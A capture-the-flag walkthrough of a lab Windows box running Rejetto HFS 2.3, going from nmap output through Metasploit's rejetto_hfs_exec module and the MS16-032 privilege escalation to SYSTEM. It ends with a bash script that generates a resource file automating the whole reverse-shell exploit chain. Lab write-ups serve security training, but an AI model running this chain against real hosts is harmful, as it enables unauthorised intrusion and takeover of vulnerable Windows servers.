PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1.2. website recon
even though nmap reports two findings, both are denial-of-service issues (Slowloris and the Apache byte-range bug), neither of which gives code execution. note also that the http-vuln-cve2011-3192 check is written for Apache httpd, so on a server that is not Apache it is most likely a false positive. since we're looking for a remote code execution vulnerability, let's visit the web application in the browser instead
the page identifies the server as HttpFileServer 2.3 (Rejetto HFS). that version string is what we'll search for next
2. msfconsole
let's start by running search HttpFileServer 2.3 in msfconsole. the search returns the Rejetto HttpFileServer remote command execution module, exploit/windows/http/rejetto_hfs_exec, which targets exactly this version. use it, set rhosts to the target and lhost to your own ip (rport defaults to 80, matching the nmap output), then run exploit to get a meterpreter session
once the session opens, run getuid to see which user we landed as. the user flag can be found at C:\Users\kostas\Desktop
3. root.txt
let's try and find a vector to escalate our privileges. within our meterpreter session run the command run post/multi/recon/local_exploit_suggester, which checks the session against metasploit's local exploit modules
the output lists exploit/windows/local/ms16_032_secondary_logon_handle_privesc with the note "The service is running, but could not be validated". that means the check only confirmed the Secondary Logon service is running, not that the host is missing the patch, so treat it as a candidate worth trying rather than a confirmed hit. if you want more certainty first, run post/windows/gather/enum_patches to list the installed hotfixes
so let's use this exploit. send the current session to the background with the background command (ctrl+z also works), then run use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set the options
set lhost YOUR_IP
set session SESSION_NUMBER
you can check the session number using sessions. if the handler from the first exploit is still listening on port 4444, also set lport to a free port so the new reverse shell doesn't collide with it
finally, run exploit. once the new meterpreter session opens, run shell and then whoami to confirm that we are nt authority\system
the root flag can be found at C:\Users\Administrator\Desktop
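the whole chain above (rejetto_hfs_exec, local_exploit_suggester, ms16_032) can be scripted as a metasploit resource file so it is repeatable. the following is an added example written for this writeup, not code from the original page or from metasploit: a small bash wrapper (hypothetical name hfs_chain.sh) that generates the .rc from the target and listener addresses and hands it to msfconsole -r. it assumes HFS is on port 80 as in the nmap output, that the first session gets number 1 and the elevated one number 2 (check with sessions -l if your numbering differs), and that the two reverse handlers use different ports so they don't clash. the sleep values are guesses for a lab box; raise them if the session hasn't appeared yet.

```bash
#!/usr/bin/env bash
# Added example for this writeup (not from the original page or Metasploit):
# build a Metasploit resource script that runs the HFS 2.3 -> MS16-032 chain.
# Assumptions (ours, not the page's): HFS on port 80, first session is #1,
# two distinct listener ports so the stage-1 and stage-2 handlers don't collide.
set -eu

# build_rc TARGET_IP YOUR_IP [LPORT_USER] [LPORT_SYSTEM]
# prints the .rc to stdout; refuses to build one whose two handlers share a port
build_rc() {
    local rhost="$1" lhost="$2" lport_user="${3:-4444}" lport_sys="${4:-4445}"
    if [ "$lport_user" = "$lport_sys" ]; then
        echo "build_rc: listener ports must differ ($lport_user)" >&2
        return 1
    fi

    # stage 1: Rejetto HFS 2.3 remote command execution -> meterpreter as the HFS user.
    # -j runs the exploit as a job, -z keeps msfconsole from interacting with the session.
    cat <<EOF
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS $rhost
set RPORT 80
set LHOST $lhost
set LPORT $lport_user
exploit -j -z
sleep 20
sessions -l
EOF

    # stage 2: what the suggester thinks of session 1 (information only, it exploits nothing)
    cat <<EOF
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
EOF

    # stage 3: MS16-032 Secondary Logon handle privesc against session 1, on a second
    # listener port so it cannot collide with the stage-1 handler; the new session
    # should show up as nt authority\\system in the final sessions -l
    cat <<EOF
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set LHOST $lhost
set LPORT $lport_sys
exploit -j -z
sleep 30
sessions -l
EOF
}

# usage: ./hfs_chain.sh TARGET_IP YOUR_IP   (both arguments required to actually run)
if [ $# -eq 2 ]; then
    rc_file="$(mktemp /tmp/hfs_chain.XXXXXX.rc)"
    build_rc "$1" "$2" > "$rc_file"
    msfconsole -q -r "$rc_file"
fi
```

after the script finishes its stage 3 sleep, interact with the new session (sessions -i 2 in the assumed numbering) and run getuid or shell / whoami to confirm system, then collect the root flag from C:\Users\Administrator\Desktop as above.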